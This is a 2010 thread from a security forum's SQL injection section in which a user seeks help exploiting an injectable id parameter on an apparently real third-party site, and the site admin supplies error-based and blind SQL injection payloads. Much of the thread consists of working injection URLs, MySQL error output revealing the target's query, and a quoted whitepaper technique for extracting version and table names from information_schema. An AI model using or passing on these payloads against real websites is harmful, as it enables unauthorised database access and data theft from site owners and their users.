 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Help in Sql injection plizz |
 |
 Posted: Mon Sep 06, 2010 1:48 am |
 |
|
| pink_spider |
| Advanced user |
 |
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
 |
|
 |
|
| Code: | | http://www.site.com/index.php?id=2773+order+by+1,2,3,4,5,6-- |
it is ook'
but UNION fail ) :
| Code: | | http://www.site.com/index.php?id=2773 UNION all SELECT 1,2,3,4,5,6-- |
et erroe is :
| Code: |
Erro ao executar a SQL!
mysql error: [1222: The used SELECT statements have a different number of columns] in EXECUTE(\"SELECT l.*, lo.*, DATE_FORMAT(l.licitacao_data_abertura,\'%d/%m/%Y\') as licitacao_data_abertura FROM swp_licitacoes l inner join swp_secoes lo on l.secoes_id = lo.secoes_id WHERE l.licitacao_id = 2773 UNION all SELECT version(),version(),version(),version(),version(),version()-- LIMIT 18446744073709551615\")
|
HELP ME PLIZZ
[/code] |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 11:49 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This situation is common - vulnerable GET/POST parameter is used in multiple sql queries with different column count. So if you get count right for first sql query, then second query will still fail.
My suggestion is error-based sql injection:
| Code: |
http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>1,(SELECT+1+UNION+ALL+SELECT+1),1))
|
| Code: |
http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))
|
Some more useful information:
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 9:59 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
Very good! thanks
most my problems are not over!
I injected the second code and it worked! I think ¬ ¬
| Code: |
http://www.site.com//index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))
|
most do not show up anything on the page!
did not show the version of sql. fuss was indeed null.
how do I fix this problem?
and if not asking too much. I would like to explain the code I posted!
I thank you!
(Y)
[/code] |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 10:13 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Did you get error message as this:
| Code: |
Subquery returns more than 1 row
|
It's blind injection, you can retrieve information one bit at the time.
And you need special software for exploitation, because manual way is too error prone and too time consuming.
If you know php, perl, ruby, java or other programming languages, then it's not hard to write needed script or program.
Or try methods from whitepaper, suggested above, it may give you easier ways to exploitation. |
|
|
|
|
| Posted: Mon Sep 06, 2010 10:16 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
| I can post the website address that contains the vulnerability? or are prohibited by the forum? |
|
|
|
|
| Posted: Mon Sep 06, 2010 10:18 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| pink_spider wrote: | | I can post the website address that contains the vulnerability? or are prohibited by the forum? |
Nope, don't post sensitive information to this forum. |
|
|
|
|
| Posted: Mon Sep 06, 2010 10:23 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
ok!
Thanks anyway.
in two columns gives error when using ORDER BY
in column No. 6 and No. 26
I selected and up to 500
what happens then? |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 10:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Did you read whitepaper I was suggesting?
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
| Code: |
[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar has got a universal technique of exploitation of Blind SQL Injection vulnerabilities in applications operating under MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in these depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0:
mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). It means that we will often fail to obtain the necessary data with one http query.
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1
Here is an example of practical use of the method for database structure restoration:
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
|
Analyze that information and do some local tests at your home computer before going online. |
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 10:37 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
ook'
thankyou'
 |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
